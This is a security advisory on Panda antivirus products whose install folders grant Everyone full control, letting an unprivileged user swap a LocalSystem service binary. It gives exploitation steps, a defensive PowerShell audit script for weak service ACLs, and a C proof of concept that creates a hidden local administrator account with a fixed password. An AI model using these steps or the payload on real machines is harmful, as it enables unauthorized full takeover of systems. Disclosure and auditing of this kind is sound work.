Description:
============
1. 32Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------
During installation of Panda Security for Desktops/File Servers the
permissions for the installation folder
%ProgramFiles%\Panda Software\AVTC\
are set to Everyone:Full Control by default. A few services
(e.g. PAVSRV51.EXE) are started from this folder. The services run
under the LocalSystem account.
The 32bit Version of Panda Security for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.
A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which TPSrv is not started and
all service files can be manipulated.
This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot the trojaned application is executed under the LocalSystem
account.
Executables started as services:
+------------------------------
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe
2. 64Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------
During installation of Panda Security for Desktops/File Servers the
permissions for the installation folder
%ProgramFiles%\Panda Software\AVTC\
are set to Everyone:Full Control by default. A few services
(e.g. PavSrvx86.EXE) are started from this folder. The services run
under the LocalSystem account.
The 64bit version of Panda Security for Desktops/File Servers has no
TruePrevent package available to protect the files in the
installation directory from manipulation.
There is no protection of service files. An unprivileged user can
replace a service executable with a file of his choice to get
full access with LocalSystem privileges.
This can be exploited by:
a. Rename PavSrvX86.exe to PavSrvX86.old in Panda folder
b. Copy any application to PavSrvX86.exe
c. Reboot
Upon reboot the trojaned application is executed under the LocalSystem
account.
Executables started as services:
+------------------------------
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PavSrvX86.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsImSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PskSvc.exe
C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsCtrlS.exe
3. Panda Internet Security/Global Protection/Antivirus Pro 20XX
+-----------------------------------------------------------------------
During installation of the Panda Security 20XX products the
permissions for the installation folder
%ProgramFiles%\panda security\panda <product>\
are set to Everyone:Full Control by default. A few services
(e.g. PAVSRV51.EXE) are started from this folder. The services run
under the LocalSystem account.
These products install the TruePrevent package by default, which
protects the files in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.
A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which TPSrv is not started and
all service files can be manipulated.
This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot the trojaned application is executed under the LocalSystem
account.
Executables started as services:
+------------------------------
%ProgramFiles%\panda security\panda <product>\firewall\PSHOST.EXE
%ProgramFiles%\Panda Security\Panda <product>\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda <product>\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda <product>\PskSvc.exe
%ProgramFiles%\Panda Security\Panda <product>\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda <product>\TPSrv.exe
4. Panda Antivirus for Netbooks
+------------------------------
During installation of Panda Antivirus for Netbooks the
permissions for the installation folder
%ProgramFiles%\panda security\Panda Antivirus for Netbooks\
are set to Everyone:Full Control by default. A few services
(e.g. PAVSRV51.EXE) are started from this folder. The services run
under the LocalSystem account.
This product installs the TruePrevent package by default, which protects
the files in the installation directory from manipulation.
If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.
A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which TPSrv is not started and
all service files can be manipulated.
This can be exploited by:
a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot
Upon reboot the trojaned application is executed under the LocalSystem
account.
This product was not patched like the other 2010 products, so the
following vulnerability still exists:
http://www.securityfocus.com/bid/36897
TruePrevent bypass: It can be bypassed using the "Open" dialog in the
"Quarantine" -> "Add file" functionality.
Executables started as services:
+------------------------------
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PavFnSvr.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsImSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\pavsrv51.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PskSvc.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsCtrls.exe
%ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\TPSrv.exe
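
Audit check for the condition described in sections 1 to 4 (a service
running as LocalSystem from a folder writable by unprivileged users). This
is an added example, not part of the original advisory; the set of SIDs
treated as unprivileged and the helper name Get-WeakAce are assumptions.

```powershell
# Added example, not part of the advisory. Flags LocalSystem services whose
# executable or parent folder grants write-type rights to broad principals.
$lowPrivSids = @{                # assumption: these count as "unprivileged"
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}
# Rights sufficient to rename or replace a file, plus GENERIC_WRITE / GENERIC_ALL.
$mask = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$mask = $mask -bor 0x40000000 -bor 0x10000000

function Get-WeakAce {           # hypothetical helper name
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $sidType = [System.Security.Principal.SecurityIdentifier]
    foreach ($ace in (Get-Acl -LiteralPath $Path).GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and $lowPrivSids.ContainsKey($sid) -and
            ([int]$ace.FileSystemRights -band $mask)) {
            [pscustomobject]@{
                Path = $Path; Principal = $lowPrivSids[$sid]; Rights = $ace.FileSystemRights
            }
        }
    }
}

Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
    ForEach-Object {
        # PathName may be quoted and may carry arguments; keep only the executable.
        $exe = $null
        if ($_.PathName -match '^\s*"([^"]+)"') { $exe = $Matches[1] }
        elseif ($_.PathName -match '^\s*(.+?\.exe)') { $exe = $Matches[1] }
        if (-not $exe) { return }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        $svc = $_.Name
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            Get-WeakAce -Path $target |
                Select-Object @{ n = 'Service'; e = { $svc } }, Path, Principal, Rights
        }
    } | Format-Table -AutoSize
```

Run it from an elevated prompt so every ACL can be read. A finding is
remediated by removing the broad ACE from the folder and its files (for
example with icacls and its /remove:g option) rather than by relying on
TruePrevent, which is not running in SafeBoot mode.
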
Proof of Concept :
==================
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/* Payload that is run as LocalSystem once it has replaced a service binary. */
INT main( VOID )
{
    CHAR szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

    GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
    wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );
    system( szCmdLine );

    printf( "Adding user \"owner\" to the local Administrators group...\n" );
    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );
    system( szCmdLine );

    return 0;
}